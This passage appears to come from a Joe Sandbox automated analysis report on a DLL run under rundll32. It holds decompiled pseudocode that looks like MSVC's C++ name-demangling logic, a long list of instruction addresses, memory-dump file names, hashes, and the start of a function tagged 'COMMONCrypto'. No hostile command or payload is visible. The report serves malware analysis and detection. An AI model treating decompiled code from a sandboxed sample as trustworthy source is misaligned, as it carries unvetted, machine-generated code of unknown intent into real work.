									_t848 =  !((_t844 >> 0x00000002 |  *0x1004e00c) >> 1);
									_push( &_v12);
									__eflags =  !((_t844 >> 0x00000002 |  *0x1004e00c) >> 1) & 0x00000001;
									if(__eflags == 0) {
										E1000792E( &_v20, E10008C87(_t853, __eflags));
									} else {
										_t689 = E10007637(_t848,  &_v56, 0x20, E10008C87(_t853, __eflags));
										_t884 = _t884 + 0x10;
										_v20 =  *_t689;
										_v16 =  *((intOrPtr*)(_t689 + 4));
									}
									_t853 = _a8;
									_t761 = _v36;
								}
								_t540 = _v24;
								_t879 = _v68;
								_v60 = _t540;
								__eflags = _t761 - 0x800;
								if(_t761 != 0x800) {
									_v60 = _t879;
								}
								__eflags = _v60 - _t867;
								if(_v60 == _t867) {
									L37:
									_t864 = 0x800;
									_v56 = _t867;
									_v52 = _t867;
									_v12 = _t867;
									_v8 = _t867;
									_v88 = _t867;
									_v84 = _t867;
									_v60 = _t867;
									_v24 = _t867;
									_v80 = _t867;
									_v76 = _t867;
									__eflags = _t761 - 0x800;
									if(_t761 != 0x800) {
										_t540 = _t879;
									}
									_t881 = _t696 & 0x00000700;
									__eflags = _t540;
									if(_t540 == 0) {
										L48:
										__eflags = _t761 - _t864;
										if(_t761 == _t864) {
											__eflags = _t881 - 0x200;
											if(_t881 != 0x200) {
												_t627 =  *0x1004e00c; // 0x0
												__eflags = (_t627 & 0x00000060) - 0x60;
												_push( &_v32);
												if((_t627 & 0x00000060) == 0x60) {
													E1000792E( &_v80, E1000C6F9());
												} else {
													_t632 = E1000C6F9();
													_v80 =  *_t632;
													_v76 = _t632[1];
												}
											}
										}
										_t762 =  *0x1004e00c; // 0x0
										_t543 =  !(_t762 >> 1);
										__eflags = _t543 & 0x00000001;
										_push( &_v32);
										if((_t543 & 0x00000001) == 0) {
											L56:
											E1000792E( &_v20, E10009326());
											L57:
											_t547 = _a8;
											_t765 =  *_t547;
											__eflags = _t765;
											if(_t765 == 0) {
												L62:
												_v68 = _t867;
												_v28 = _t867;
												__eflags = _v92 - _t867;
												if(_v92 == _t867) {
													_t548 = E1000A9CF(0x1004e020, 8);
													__eflags = _t548;
													if(_t548 != 0) {
														 *_t548 = _t867;
														 *(_t548 + 4) = _t867;
														_t867 = _t548;
													}
													_t550 = E1000B7CC(_t696,  &_v108, _t867);
													_v68 =  *_t550;
													_v28 =  *((intOrPtr*)(_t550 + 4));
													L68:
													_t552 = _v36;
													_t770 = _t696;
													__eflags = _t552 - 0x800;
													if(_t552 != 0x800) {
														_t771 = _t770 & 0x00001000;
														__eflags = _t771;
													} else {
														_t771 = _t770 & 0x00000400;
													}
													__eflags = _t771;
													if(_t771 == 0) {
														L81:
														__eflags =  *0x1004e01c - 1;
														if( *0x1004e01c == 1) {
															__eflags =  *0x1004e018;
															if( *0x1004e018 == 0) {
																 *0x1004e018 = _v100;
															}
														}
														E100077A0( &_v20, E100076C8(E10007637(_t771,  &_v116, 0x28, E1000892F( &_v48)),  &_v124, 0x29));
														__eflags = _v36 - 0x800;
														if(_v36 == 0x800) {
															__eflags = (_t696 & 0x00000700) - 0x200;
															if((_t696 & 0x00000700) != 0x200) {
																E100077A0( &_v20,  &_v80);
															}
														}
														_t559 =  *0x1004e00c; // 0x0
														_t561 =  !(_t559 >> 0x13);
														__eflags = _t561 & 0x00000001;
														_push( &_v48);
														if((_t561 & 0x00000001) == 0) {
															_t563 = E1000B6A3(0x800);
															_t776 =  &_v20;
															E1000792E( &_v20, _t563);
														} else {
															_t586 = E1000B6A3(0x800);
															_t776 =  &_v20;
															E100077A0( &_v20, _t586);
														}
														E100077A0( &_v20, E1000AA59(_t776,  &_v48));
														_t568 =  *0x1004e00c; // 0x0
														_t570 =  !(_t568 >> 8);
														__eflags = _t570 & 0x00000001;
														_push( &_v48);
														if((_t570 & 0x00000001) == 0) {
															E1000792E( &_v20, E1000C728());
														} else {
															E100077A0( &_v20, E1000C728());
														}
														E1000792E( &_v20, E10009F1F( &_v48));
														_t577 =  *0x1004e00c; // 0x0
														_t579 =  !(_t577 >> 2);
														__eflags = _t579 & 0x00000001;
														if((_t579 & 0x00000001) == 0) {
															goto L97;
														} else {
															__eflags = _t867;
															if(_t867 == 0) {
																goto L97;
															}
															 *_t867 = _v20;
															 *((intOrPtr*)(_t867 + 4)) = _v16;
															_v20 = _v68;
															_t583 = _v28;
															goto L96;
														}
													} else {
														__eflags = _t552 - 0x800;
														if(_t552 != 0x800) {
															L79:
															_v12 = "`adjustor{";
															_v8 = 0xa;
															E10007748( &_v20,  &_v12);
															L80:
															_v12 = _v60;
															_v8 = _v24;
															_v56 = "}\' ";
															_v52 = 3;
															E10007748( &_v12,  &_v56);
															_t771 =  &_v20;
															E100077A0( &_v20,  &_v12);
															goto L81;
														}
														__eflags = _t881 - 0x600;
														if(_t881 != 0x600) {
															__eflags = _t552 - 0x800;
															if(_t552 != 0x800) {
																goto L79;
															}
															__eflags = _t881 - 0x500;
															if(_t881 != 0x500) {
																goto L79;
															}
															_v12 = "`vtordisp{";
															_v8 = 0xa;
															E100076A6(E1000723E( &_v48,  &_v12),  &_v12,  &_v88);
															_push(0x2c);
															_push( &_v116);
															_t793 =  &_v12;
															L78:
															E100077A0( &_v20, E100076C8(_t793));
															goto L80;
														}
														_v96 = "`vtordispex{";
														_v92 = 0xc;
														E100076A6(E1000723E( &_v108,  &_v96),  &_v96,  &_v56);
														_t614 = E100076A6(E100076C8(E100076A6(E100076C8( &_v96,  &_v132, 0x2c),  &_v140,  &_v12),  &_v124, 0x2c),  &_v116,  &_v88);
														_push(0x2c);
														_push( &_v48);
														_t793 = _t614;
														goto L78;
													}
												}
												_t618 = E10007637(_t765,  &_v108, 0x20, E1000B7CC(_t696,  &_v96, _t867));
												_t884 = _t884 + 0x14;
												E100077A0( &_v20, _t618);
												__eflags =  *0x1004e00c & 0x00001000;
												if(( *0x1004e00c & 0x00001000) == 0) {
													goto L68;
												}
												goto L223;
											}
											__eflags = _v20 - _t867;
											if(_v20 == _t867) {
												L61:
												_v20 = _t765;
												_v16 = _t547[1];
												goto L62;
											}
											__eflags =  *0x1004e00c & 0x00001000;
											if(( *0x1004e00c & 0x00001000) != 0) {
												goto L61;
											}
											_t622 = E10007637(_t765,  &_v32, 0x20, _t547);
											_t884 = _t884 + 0xc;
											_t765 =  &_v20;
											E100077A0( &_v20, _t622);
											goto L62;
										}
										_t811 =  !(_t762 >> 4);
										__eflags = _t811 & 0x00000001;
										if((_t811 & 0x00000001) == 0) {
											goto L56;
										}
										_t625 = E100076A6(E10009326(),  &_v72,  &_v20);
										_v20 =  *_t625;
										_v16 =  *((intOrPtr*)(_t625 + 4));
										goto L57;
									} else {
										__eflags = _t761 - _t864;
										if(_t761 != _t864) {
											L47:
											E10009E08(_t864,  &_v32, 1);
											_t864 = 0x800;
											_t761 = _v36;
											_v60 = _v32;
											_v24 = _v28;
											goto L48;
										}
										__eflags = _t881 - 0x600;
										if(_t881 != 0x600) {
											_t638 = _t881;
											__eflags = _t761 - _t864;
											if(_t761 != _t864) {
												goto L47;
											}
											__eflags = _t638 - 0x500;
											if(_t638 != 0x500) {
												goto L47;
											}
											E10009E08(_t864,  &_v64, 1);
											_v88 = _v64;
											_t642 = _v60;
											L46:
											_v84 = _t642;
											goto L47;
										}
										E10009E08(_t864,  &_v32, 1);
										_v56 = _v32;
										_v52 = _v28;
										E10009E08(_t864,  &_v32, 1);
										_v12 = _v32;
										_v8 = _v28;
										E10009E08(_t864,  &_v32, 1);
										_t884 = _t884 + 0x18;
										_v88 = _v32;
										_t642 = _v28;
										goto L46;
									}
								} else {
									__eflags = _t761 - 0x1800;
									if(_t761 != 0x1800) {
										goto L37;
									}
									_t655 = E100076C8(_t853,  &_v56, 0x7b);
									E10009E08(_t853,  &_v12, _t867);
									E100077A0( &_v20, E100076A6(_t655,  &_v80,  &_v12));
									E1000CB9A( &_v20,  &_v56);
									_pop(_t830);
									__eflags =  *0x1004e00c & 0x00001000;
									if(( *0x1004e00c & 0x00001000) == 0) {
										_v12 = "}\' ";
										_v8 = 3;
										_t681 = E10007637(_t830,  &_v80, 0x2c,  &_v56);
										_t884 = _t884 + 0xc;
										E100077A0( &_v20, E10007684(_t681,  &_v88,  &_v12));
									}
									_v12 = "}\'";
									_v8 = 2;
									E10007748( &_v20,  &_v12);
									E10009326( &_v12);
									_t833 =  *0x1004e00c; // 0x0
									_t670 =  !(_t833 >> 1);
									__eflags = _t670 & 0x00000001;
									if((_t670 & 0x00000001) == 0) {
										L97:
										_t868 = _v40;
										L146:
										_t875 = _t696 & 0x00001800;
										__eflags = _t875 - 0x800;
										_t430 = 0 | _t875 == 0x00000800;
										_t706 = _t696 & 0x00006000;
										L148:
										_v24 = _t706;
										__eflags = _t430;
										if(_t430 == 0) {
											L212:
											__eflags = _t868;
											if(_t868 == 0) {
												__eflags = _v24;
											} else {
												__eflags = _t875 - 0x800;
											}
											__eflags = 0 | __eflags == 0x00000000;
											_t433 = _t696;
											if(__eflags == 0) {
												_t434 = _t433 & 0x00001000;
												__eflags = _t434;
											} else {
												_t434 = _t433 & 0x00000400;
											}
											__eflags = _t434;
											if(_t434 != 0) {
												__eflags =  *0x1004e00c & 0x00001000;
												if(( *0x1004e00c & 0x00001000) == 0) {
													_v12 = "[thunk]:";
													_v8 = 8;
													E100076A6(E1000723E( &_v48,  &_v12),  &_v12,  &_v20);
													_v20 = _v12;
													_v16 = _v8;
												}
											}
											__eflags = _t696 & 0x00010000;
											if((_t696 & 0x00010000) != 0) {
												_v12 = "extern \"C\" ";
												_v8 = 0xb;
												E100076A6(E1000723E( &_v48,  &_v12),  &_v12,  &_v20);
												_v20 = _v12;
												_v16 = _v8;
											}
											L223:
											_t435 = _a4;
											 *_t435 = _v20;
											_t435[1] = _v16;
											L224:
											return _t435;
										}
										_t446 =  *0x1004e00c; // 0x0
										_t448 =  !(_t446 >> 9);
										__eflags = _t448 & 0x00000001;
										if((_t448 & 0x00000001) == 0) {
											L183:
											_t449 =  *0x1004e00c; // 0x0
											_t451 =  !(_t449 >> 7);
											__eflags = _t451 & 0x00000001;
											if((_t451 & 0x00000001) == 0) {
												goto L212;
											}
											_t717 = _v24;
											__eflags = _t868;
											if(_t868 == 0) {
												__eflags = _t717;
											} else {
												__eflags = _t875 - 0x800;
											}
											if(__eflags == 0) {
												L193:
												__eflags = _t868;
												if(_t868 == 0) {
													__eflags = _t717;
												} else {
													__eflags = _t875 - 0x800;
												}
												if(__eflags == 0) {
													L202:
													__eflags = _t868;
													if(_t868 == 0) {
														__eflags = _t717;
														_t457 = 0 | _t717 == 0x00000000;
														_t719 = _t696 & 0x00001800;
														__eflags = _t719;
													} else {
														__eflags = _t875 - 0x800;
														_t719 = _t875;
														_t457 = 0 | _t875 == 0x00000800;
													}
													__eflags = _t457;
													if(_t457 == 0) {
														goto L212;
													} else {
														__eflags = _t868;
														if(_t868 == 0) {
															__eflags = _t719;
														} else {
															_push(0);
															__eflags = _t696 & 0x000000c0;
															_pop(0);
														}
														if(__eflags == 0) {
															goto L212;
														} else {
															_v12 = "public: ";
															_v8 = 8;
															goto L211;
														}
													}
												} else {
													__eflags = _t868;
													if(_t868 == 0) {
														__eflags = _t875 - 0x1000;
													} else {
														__eflags = (_t696 & 0x000000c0) - 0x80;
													}
													if(__eflags == 0) {
														goto L202;
													} else {
														_v12 = "protected: ";
														_v8 = 0xb;
														goto L211;
													}
												}
											} else {
												__eflags = _t868;
												if(_t868 == 0) {
													__eflags = _t875 - 0x800;
												} else {
													__eflags = (_t696 & 0x000000c0) - 0x40;
												}
												if(__eflags == 0) {
													goto L193;
												} else {
													_v12 = "private: ";
													_v8 = 9;
													L211:
													E100076A6(E1000723E( &_v48,  &_v12),  &_v12,  &_v20);
													_v20 = _v12;
													_v16 = _v8;
													goto L212;
												}
											}
										}
										__eflags = _t868;
										if(_t868 == 0) {
											__eflags = _t706;
										} else {
											__eflags = _t875 - 0x800;
										}
										if(__eflags == 0) {
											L157:
											__eflags = _t868;
											if(_t868 == 0) {
												_t471 = _v24;
												_t724 = 0;
												__eflags = _t471;
												goto L161;
											}
											goto L158;
										} else {
											__eflags = _t868;
											if(_t868 == 0) {
												L156:
												_v12 = "static ";
												_v8 = 7;
												E100076A6(E1000723E( &_v48,  &_v12),  &_v12,  &_v20);
												_v20 = _v12;
												_v16 = _v8;
												goto L157;
											}
											__eflags = (_t696 & 0x00000700) - 0x200;
											if((_t696 & 0x00000700) != 0x200) {
												L158:
												__eflags = (_t696 & 0x00000700) - 0x100;
												if((_t696 & 0x00000700) == 0x100) {
													L182:
													_v12 = "virtual ";
													_v8 = 8;
													E100076A6(E1000723E( &_v48,  &_v12),  &_v12,  &_v20);
													_v20 = _v12;
													_v16 = _v8;
													goto L183;
												}
												_t471 = _v24;
												_t724 = 0;
												__eflags = _t875 - 0x800;
												L161:
												__eflags = _t724 & 0xffffff00 | __eflags == 0x00000000;
												_t726 = _t696;
												if(__eflags == 0) {
													_t727 = _t726 & 0x00001000;
													__eflags = _t727;
												} else {
													_t727 = _t726 & 0x00000400;
												}
												__eflags = _t727;
												if(_t727 == 0) {
													goto L183;
												} else {
													__eflags = _t868;
													if(_t868 == 0) {
														__eflags = _t471;
														_t729 = 0 | _t471 == 0x00000000;
														_t861 = _t696 & 0x00001800;
														__eflags = _t861;
													} else {
														__eflags = _t875 - 0x800;
														_t861 = _t875;
														_t729 = 0 | _t875 == 0x00000800;
														_t471 = _t696 & 0x00006000;
													}
													__eflags = _t729;
													_v28 = _t471;
													_t730 = _t696;
													if(_t729 == 0) {
														_t731 = _t730 & 0x00000700;
														__eflags = _t731;
														goto L172;
													} else {
														_t731 = _t730 & 0x00000700;
														__eflags = _t731 - 0x500;
														if(_t731 == 0x500) {
															goto L182;
														}
														L172:
														_t472 = _t696;
														__eflags = _t868;
														if(_t868 == 0) {
															_t473 = _t472 & 0x00006000;
															__eflags = _t473;
														} else {
															_t473 = (_t472 & 0x00001800) - 0x800;
														}
														asm("sbb eax, eax");
														__eflags =  ~_t473 + 1;
														if( ~_t473 + 1 == 0) {
															L177:
															__eflags = _t868;
															if(_t868 == 0) {
																__eflags = _v28;
															} else {
																__eflags = _t861 - 0x800;
															}
															if(__eflags == 0) {
																goto L183;
															} else {
																__eflags = _t731 - 0x400;
																if(_t731 != 0x400) {
																	goto L183;
																}
																goto L182;
															}
														} else {
															__eflags = _t731 - 0x600;
															if(_t731 == 0x600) {
																goto L182;
															}
															goto L177;
														}
													}
												}
											}
											goto L156;
										}
									} else {
										_t673 =  !(_t833 >> 4);
										__eflags = _t673 & 0x00000001;
										if((_t673 & 0x00000001) == 0) {
											goto L97;
										}
										__eflags = 0x00001000 & _t833;
										if((0x00001000 & _t833) != 0) {
											goto L97;
										}
										_t678 = E100076A6(E100076C8(E10007637(_t833,  &_v56, 0x20,  &_v12),  &_v80, 0x20),  &_v88,  &_v20);
										_t583 = _t678[1];
										_v20 =  *_t678;
										L96:
										_v16 = _t583;
										goto L97;
									}
								}
							} else {
								__eflags = _t539 - 0x1100;
								if(_t539 == 0x1100) {
									goto L98;
								}
								__eflags = _t539 - 0x1200;
								if(_t539 == 0x1200) {
									goto L98;
								}
								goto L22;
							}
						} else {
							__eflags = (_t538 & 0x00001b00) - 0x1000;
							if((_t538 & 0x00001b00) == 0x1000) {
								goto L98;
							}
							_t538 = _t696;
							goto L16;
						}
					}
				}
				_v92 = 1;
				if(( *(_t853 + 4) & 0x00000200) != 0) {
					goto L3;
				}
				goto L2;
			}

0x100079e9
0x100079f6
0x100079f8
0x100079fb
0x100079fe
0x10007a01
0x10007a06
0x10007a09
0x10007a0e
0x10007a12
0x10007a20
0x10007a20
0x10007a23
0x10007a29
0x10007a2b
0x10007a2e
0x10007a31
0x10007a35
0x00000000
0x10007a35
0x10007a3c
0x10007a42
0x10007a49
0x00000000
0x10007a51
0x10007a59
0x10007a5f
0x10007a61
0x10007a64
0x10007a69
0x00000000
0x10007a69
0x10007a74
0x10007a74
0x10007a7a
0x10007a7d
0x1000810d
0x10008111
0x1000811b
0x1000811d
0x10008196
0x1000819d
0x1000819f
0x100081b7
0x100081ba
0x100081bc
0x100081be
0x100081c0
0x100081db
0x100081e3
0x100081e4
0x100081e7
0x100081e7
0x100081c2
0x100081c2
0x100081ca
0x100081d0
0x100081d3
0x100081d3
0x100081ed
0x100081ef
0x100081f2
0x100081f4
0x100081f6
0x1000820b
0x10008210
0x10008210
0x10008216
0x10008219
0x100081f8
0x100081f8
0x10008203
0x10008206
0x10008206
0x1000821c
0x1000821e
0x1000824e
0x10008250
0x10008252
0x1000825c
0x10008254
0x10008254
0x10008254
0x10008261
0x10008263
0x10008266
0x10008268
0x10008268
0x1000826b
0x1000826d
0x1000829a
0x1000829c
0x1000829e
0x100082a8
0x100082a0
0x100082a0
0x100082a0
0x100082ad
0x100082af
0x100082b2
0x100082b4
0x100082b4
0x100082b7
0x100082b9
0x10008357
0x10008357
0x10008359
0x00000000
0x00000000
0x10008362
0x10008367
0x00000000
0x00000000
0x00000000
0x100082bf
0x100082cf
0x100082d1
0x100082d2
0x100082d4
0x100082d6
0x100082d8
0x00000000
0x00000000
0x100082da
0x100082e1
0x00000000
0x100082e1
0x1000826f
0x1000827f
0x10008281
0x10008282
0x10008284
0x10008286
0x10008288
0x00000000
0x00000000
0x1000828a
0x10008291
0x00000000
0x10008291
0x10008220
0x10008230
0x10008232
0x10008233
0x10008235
0x10008237
0x10008239
0x00000000
0x00000000
0x1000823b
0x10008242
0x100082e8
0x100082ef
0x100082f4
0x100082f6
0x1000836d
0x1000836d
0x1000836f
0x10008300
0x10008303
0x10008305
0x10008308
0x1000830a
0x1000830a
0x1000830d
0x1000830f
0x10008374
0x1000837c
0x00000000
0x10008311
0x10008315
0x1000831d
0x10008323
0x10008326
0x10008328
0x1000832a
0x1000832c
0x10008343
0x1000834d
0x10008383
0x10008388
0x1000838b
0x1000838e
0x10008390
0x100083b3
0x100083bb
0x100083bc
0x100083bf
0x100083bf
0x00000000
0x100083bf
0x00000000
0x10008390
0x10008332
0x10008338
0x1000833b
0x1000833d
0x1000833f
0x10008341
0x00000000
0x00000000
0x00000000
0x10008341
0x1000830f
0x100082f8
0x100082f8
0x100082fa
0x00000000
0x100082fa
0x1000821e
0x100081a8
0x100081ad
0x100081af
0x100081af
0x00000000
0x100081af
0x10008121
0x10008123
0x10008128
0x10008188
0x1000818f
0x00000000
0x1000818f
0x1000812a
0x1000812f
0x00000000
0x00000000
0x10008131
0x10008136
0x00000000
0x00000000
0x1000813e
0x10008146
0x1000814d
0x10008154
0x10008157
0x10008161
0x10008181
0x00000000
0x10007a83
0x10007a85
0x10007a87
0x10007a8d
0x10007a90
0x10007a96
0x10007aac
0x10007ab1
0x10007ab4
0x10007ab4
0x10007ab4
0x10007abb
0x10007a98
0x10007a98
0x10007a9d
0x10007aa0
0x10007aa7
0x10007aa7
0x10007abe
0x10007ac0
0x10007ac2
0x10007ad6
0x10007ad6
0x10007adb
0x10007ae1
0x10007af1
0x10007af4
0x10007ae3
0x10007ae6
0x10007ae9
0x10007ae9
0x10007af7
0x10007afa
0x10007b12
0x10007b12
0x10007b18
0x10007b1a
0x10007b2e
0x10007b30
0x10007b31
0x10007b34
0x10007b61
0x10007b36
0x10007b42
0x10007b47
0x10007b4f
0x10007b52
0x10007b52
0x10007b66
0x10007b69
0x10007b69
0x10007b6c
0x10007b6f
0x10007b72
0x10007b75
0x10007b7b
0x10007b7d
0x10007b7d
0x10007b80
0x10007b83
0x10007ca1
0x10007ca1
0x10007ca6
0x10007ca9
0x10007cac
0x10007caf
0x10007cb2
0x10007cb5
0x10007cb8
0x10007cbb
0x10007cbe
0x10007cc1
0x10007cc4
0x10007cc6
0x10007cc8
0x10007cc8
0x10007ccc
0x10007cd2
0x10007cd4
0x10007d74
0x10007d74
0x10007d76
0x10007d78
0x10007d7e
0x10007d80
0x10007d88
0x10007d8d
0x10007d8e
0x10007dad
0x10007d90
0x10007d90
0x10007d9b
0x10007d9e
0x10007d9e
0x10007d8e
0x10007d7e
0x10007db2
0x10007dbc
0x10007dbe
0x10007dc3
0x10007dc4
0x10007df2
0x10007dfc
0x10007e01
0x10007e01
0x10007e04
0x10007e06
0x10007e08
0x10007e3e
0x10007e3e
0x10007e41
0x10007e44
0x10007e47
0x10007e83
0x10007e88
0x10007e8a
0x10007e8c
0x10007e8e
0x10007e91
0x10007e91
0x10007e98
0x10007ea4
0x10007ea7
0x10007eaa
0x10007eaa
0x10007eb2
0x10007eb4
0x10007eb6
0x10007ec0
0x10007ec0
0x10007eb8
0x10007eb8
0x10007eb8
0x10007ec6
0x10007ec8
0x10007fe7
0x10007fe7
0x10007fee
0x10007ff0
0x10007ff7
0x10007ffc
0x10007ffc
0x10007ff7
0x1000802a
0x1000802f
0x10008036
0x1000803f
0x10008044
0x1000804d
0x1000804d
0x10008044
0x10008052
0x1000805a
0x1000805c
0x10008061
0x10008062
0x10008075
0x1000807c
0x1000807f
0x10008064
0x10008064
0x1000806b
0x1000806e
0x1000806e
0x10008092
0x10008097
0x1000809f
0x100080a1
0x100080a6
0x100080a7
0x100080c4
0x100080a9
0x100080b3
0x100080b3
0x100080d7
0x100080dc
0x100080e4
0x100080e6
0x100080e8
0x00000000
0x100080ea
0x100080ea
0x100080ec
0x00000000
0x00000000
0x100080f1
0x100080f6
0x100080fc
0x100080ff
0x00000000
0x100080ff
0x10007ece
0x10007ece
0x10007ed0
0x10007f9b
0x10007f9e
0x10007fa9
0x10007fb0
0x10007fb5
0x10007fbb
0x10007fc1
0x10007fc8
0x10007fcf
0x10007fd6
0x10007fdf
0x10007fe2
0x00000000
0x10007fe2
0x10007ed6
0x10007edc
0x10007f4d
0x10007f4f
0x00000000
0x00000000
0x10007f51
0x10007f57
0x00000000
0x00000000
0x10007f5c
0x10007f67
0x10007f7d
0x10007f82
0x10007f87
0x10007f88
0x10007f8b
0x10007f94
0x00000000
0x10007f94
0x10007ee1
0x10007eec
0x10007f02
0x10007f3e
0x10007f46
0x10007f48
0x10007f49
0x00000000
0x10007f49
0x10007ec8
0x10007e5a
0x10007e5f
0x10007e66
0x10007e6b
0x10007e75
0x00000000
0x00000000
0x00000000
0x10007e77
0x10007e0a
0x10007e0d
0x10007e35
0x10007e38
0x10007e3b
0x00000000
0x10007e3b
0x10007e0f
0x10007e19
0x00000000
0x00000000
0x10007e22
0x10007e27
0x10007e2a
0x10007e2e
0x00000000
0x10007e2e
0x10007dc9
0x10007dcb
0x10007dce
0x00000000
0x00000000
0x10007de0
0x10007dea
0x10007ded
0x00000000
0x10007cda
0x10007cda
0x10007cdc
0x10007d53
0x10007d59
0x10007d61
0x10007d68
0x10007d6b
0x10007d71
0x00000000
0x10007d71
0x10007cde
0x10007ce4
0x10007d2d
0x10007d2f
0x10007d31
0x00000000
0x00000000
0x10007d33
0x10007d38
0x00000000
0x00000000
0x10007d40
0x10007d49
0x10007d4c
0x10007d50
0x10007d50
0x00000000
0x10007d50
0x10007cec
0x10007cf4
0x10007cfa
0x10007d03
0x10007d0b
0x10007d11
0x10007d1a
0x10007d22
0x10007d25
0x10007d28
0x00000000
0x10007d28
0x10007b89
0x10007b89
0x10007b8f
0x00000000
0x00000000
0x10007b9d
0x10007ba9
0x10007bc3
0x10007bcc
0x10007bd6
0x10007bd7
0x10007bdd
0x10007be2
0x10007bed
0x10007bf7
0x10007bfc
0x10007c12
0x10007c12
0x10007c1a
0x10007c25
0x10007c2c
0x10007c35
0x10007c3b
0x10007c45
0x10007c47
0x10007c49
0x10008105
0x10008105
0x10008392
0x10008396
0x1000839e
0x100083a4
0x100083a7
0x100083c5
0x100083c5
0x100083c8
0x100083ca
0x10008658
0x1000865a
0x1000865c
0x10008666
0x1000865e
0x1000865e
0x1000865e
0x1000866c
0x1000866e
0x10008670
0x10008679
0x10008679
0x10008672
0x10008672
0x10008672
0x1000867e
0x10008680
0x10008682
0x1000868c
0x10008691
0x1000869c
0x100086b2
0x100086ba
0x100086c0
0x100086c0
0x1000868c
0x100086c3
0x100086c9
0x100086ce
0x100086d9
0x100086ef
0x100086f7
0x100086fd
0x100086fd
0x10008700
0x10008700
0x10008706
0x1000870b
0x1000870e
0x00000000
0x1000870e
0x100083d0
0x100083d8
0x100083da
0x100083dc
0x1000854c
0x1000854c
0x10008554
0x10008556
0x10008558
0x00000000
0x00000000
0x1000855e
0x10008563
0x10008565
0x1000856f
0x10008567
0x10008567
0x10008567
0x10008576
0x100085a6
0x100085a8
0x100085aa
0x100085b4
0x100085ac
0x100085ac
0x100085ac
0x100085bb
0x100085e8
0x100085ea
0x100085ec
0x100085fb
0x100085ff
0x10008602
0x10008602
0x100085ee
0x100085ee
0x100085f4
0x100085f6
0x100085f6
0x10008608
0x1000860a
0x00000000
0x1000860c
0x1000860c
0x1000860e
0x1000861a
0x10008610
0x10008610
0x10008612
0x10008615
0x10008615
0x10008621
0x00000000
0x10008623
0x10008623
0x1000862a
0x00000000
0x1000862a
0x10008621
0x100085bd
0x100085bf
0x100085c1
0x100085cb
0x100085c3
0x100085c7
0x100085c7
0x100085d6
0x00000000
0x100085d8
0x100085d8
0x100085df
0x00000000
0x100085df
0x100085d6
0x10008578
0x1000857a
0x1000857c
0x10008586
0x1000857e
0x10008582
0x10008582
0x10008591
0x00000000
0x10008593
0x10008593
0x1000859a
0x10008631
0x10008647
0x1000864f
0x10008655
0x00000000
0x10008655
0x10008591
0x10008576
0x100083e4
0x100083e6
0x100083f0
0x100083e8
0x100083e8
0x100083e8
0x100083f7
0x10008440
0x10008440
0x10008442
0x10008463
0x10008466
0x10008468
0x00000000
0x10008468
0x00000000
0x100083f9
0x100083f9
0x100083fb
0x1000840b
0x1000840e
0x10008419
0x1000842f
0x10008437
0x1000843d
0x00000000
0x1000843d
0x10008404
0x10008409
0x10008444
0x1000844b
0x10008450
0x10008517
0x1000851a
0x10008525
0x1000853b
0x10008543
0x10008549
0x00000000
0x10008549
0x10008456
0x10008459
0x1000845b
0x1000846a
0x1000846d
0x1000846f
0x10008471
0x1000847b
0x1000847b
0x10008473
0x10008473
0x10008473
0x10008481
0x10008483
0x00000000
0x10008489
0x1000848b
0x1000848d
0x100084a3
0x100084a7
0x100084aa
0x100084aa
0x1000848f
0x1000848f
0x10008497
0x10008499
0x1000849c
0x1000849c
0x100084b0
0x100084b2
0x100084b5
0x100084b7
0x100084c9
0x100084c9
0x00000000
0x100084b9
0x100084b9
0x100084bf
0x100084c5
0x00000000
0x00000000
0x100084cf
0x100084cf
0x100084d1
0x100084d3
0x100084e1
0x100084e1
0x100084d5
0x100084da
0x100084da
0x100084e8
0x100084eb
0x100084ed
0x100084f7
0x100084f9
0x100084fb
0x10008505
0x100084fd
0x100084fd
0x100084fd
0x1000850d
0x00000000
0x1000850f
0x1000850f
0x10008515
0x00000000
0x00000000
0x00000000
0x10008515
0x100084ef
0x100084ef
0x100084f5
0x00000000
0x00000000
0x00000000
0x100084f5
0x100084ed
0x100084b7
0x10008483
0x00000000
0x10008409
0x10007c4f
0x10007c54
0x10007c56
0x10007c58
0x00000000
0x00000000
0x10007c5e
0x10007c60
0x00000000
0x00000000
0x10007c8f
0x10007c96
0x10007c99
0x10008102
0x10008102
0x00000000
0x10008102
0x10007c49
0x10007afc
0x10007afc
0x10007b01
0x00000000
0x00000000
0x10007b07
0x10007b0c
0x00000000
0x00000000
0x00000000
0x10007b0c
0x10007ac4
0x10007ac9
0x10007ace
0x00000000
0x00000000
0x10007ad4
0x00000000
0x10007ad4
0x10007ac2
0x10007a7d
0x10007a1b
0x10007a1e
0x00000000
0x00000000
0x00000000

APIs

operator+.LIBVCRUNTIME ref: 10007A49
DName::operator+.LIBCMT ref: 10007B9D
DName::operator+.LIBCMT ref: 10007BBA

Strings

/, xrefs: 100082E1

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$operator+
String ID: /
API String ID: 1595903985-2043925204
Opcode ID: 8d6b5924833221a86c8bdaafba5acd77cabc697b80bed03c32f945bb0d5c57de
Instruction ID: fc72c815a4e8a528ccbff4e3a0ca8b4c024423698133dcf6199ed2b6b0369a75
Opcode Fuzzy Hash: 8d6b5924833221a86c8bdaafba5acd77cabc697b80bed03c32f945bb0d5c57de
Instruction Fuzzy Hash: 08825275D006099BFB05CBA4C891BEEB7F4FF483C0F114129E956E7288EB79AA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00209FDC, Relevance: 39.5, Strings: 31, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00209FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
